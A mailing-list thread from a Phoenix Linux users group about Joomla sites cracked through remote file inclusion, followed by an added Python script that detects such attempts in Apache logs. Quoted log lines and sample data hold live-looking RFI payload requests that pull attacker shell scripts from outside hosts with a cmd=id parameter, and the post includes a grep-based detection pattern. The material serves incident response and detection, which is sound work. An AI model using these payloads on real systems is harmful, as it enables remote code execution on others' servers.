-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

JD Austin wrote:
> If you're not on version 1.0.10 upgrade now:
> http://www.joomla.org/content/view/1510/74/
> I wouldn't be surprised if they make major changes in Joomla to stomp
> out this type of thing.
>
> In all cases I've had an issue the database was unaffected, only the files.
> After the initial panic that I might have been rooted I was relieved
> when I found out how they whacked the index.php and configuration.php
> files on a few of my inactive sites.
>
> After you restore the site, remove com_extcalendar and com_galeria if
> they're still installed.
> Check the directory structure to make sure they're gone.
> Also check your temp directory for strangeness.. like a '.a' directory.
>
> If you check your logs you'll find stuff like this:
>
> XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
> XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
> I regularly check to see what they're trying to circumvent now by
> grepping for this type of vulnerability in the apache access logs:
>
> /bin/grep mosConfig_absolute_path=http /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack attempts' jd@twingeckos.com
>
> The location of your apache logs may be different.
> If you don't have root you can download the logs for your domain and
> grep them locally.
>
> JD

Thanks, JD. Good advice.

I am in contact with Integrum. The site was, in fact, cracked via the
ext_calendar component that I thought I had patched. Integrum caught it
early this morning and took the site off line to thwart the attack. We
are now discussing the means of getting back online without re-instating
the vulnerability.

It will probably be tomorrow before the site is back online simply
because Integrum has been handling issues with it since very early this
morning. They need to leave it for a while. I thank them for their
efforts and support! I'll be on the phone with them tomorrow morning.

I'll keep updating status here in the list.

Alan
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFEvYi9DQw/VSQuFZYRAqpxAJ9vR3s9GGc+yvKCQ6ciMNCUNe1wPACfSHS1
WcdlshZzjYH2ryyDdlyP6A8=
=Np1E
-----END PGP SIGNATURE-----
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
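The log lines JD quotes show the classic Mambo/Joomla 1.0 remote-file-inclusion pattern: a component includes a file relative to $mosConfig_absolute_path, and with register_globals on the attacker supplies that variable in the query string as a URL, so PHP fetches and runs their script (the &cmd=id in two of the lines is the command passed to the fetched shell). The following is an added example, not code from this thread or from Joomla, that does the same check as JD's grep but parses the access log instead of string-matching it. The sample lines are constructed from the ones quoted above (same IPs, paths and URLs) plus one benign request and one percent-encoded attempt against the hypothetical host evil.example, which the literal grep for mosConfig_absolute_path=http would miss.

```python
"""Flag mosConfig_absolute_path remote-file-inclusion attempts in Apache access logs.

Added example, not code from the mailing-list thread or from Joomla. SAMPLE_LOG
is constructed: three lines mirror the ones quoted in the thread, one is a benign
request, and one is a percent-encoded attempt using the hypothetical host evil.example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request parameter abused in the quoted log lines. A component that does
# include($mosConfig_absolute_path . '/...') with register_globals on lets
# the client choose the prefix; a URL there pulls in attacker code.
WATCHED_PARAMS = ("mosConfig_absolute_path",)

# The RFI signature is a value beginning with a URL scheme. Case-insensitive
# because PHP's URL wrappers accept HTTP:// as well as http://.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample input (see module docstring).
SAMPLE_LOG = """\
64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
10.0.0.5 - - [18/Jul/2006:10:00:00 -0700] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Jul/2006:11:00:00 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=%68ttp%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.0" 200 500 "-" "curl/7.15"
"""


def rfi_attempts(log_text, params=WATCHED_PARAMS):
    """Return one dict per request whose watched parameter points at a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; in production count these rather than drop them silently
        parts = urlsplit(m.group("target"))
        # parse_qs percent-decodes values, so %68ttp%3A%2F%2F... is seen as http://...
        query = parse_qs(parts.query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                if not REMOTE_SCHEME.match(value):
                    continue
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "component": parts.path,
                    "param": name,
                    "url": value,
                    # the kits in the quoted lines take the command to run via &cmd=
                    "cmd": query.get("cmd", [None])[0],
                    "status": int(m.group("status")),
                    # 200: the component answered, so the include may have run and the
                    # box needs a closer look; 404: the component is not installed here
                    "served": m.group("status") == "200",
                })
    return hits


def by_source(hits):
    """Count attempts per source IP, the view you'd feed into a block list or abuse report."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in rfi_attempts(SAMPLE_LOG):
        flag = "SERVED" if h["served"] else "404"
        print(f'{h["time"]} {h["ip"]} {flag} {h["component"]} {h["param"]}={h["url"]} cmd={h["cmd"]}')
    print(by_source(rfi_attempts(SAMPLE_LOG)))
```

To run it over real logs, feed the file contents to rfi_attempts() in place of SAMPLE_LOG; if the log is prefixed with a filename and colon as in JD's grep output, strip that prefix first. The 200/404 split matters for triage: a 404 means the component was not present, while a 200 against an installed com_extcalendar means the remote file may well have been fetched and executed, which is when you start looking for the dropped files JD describes.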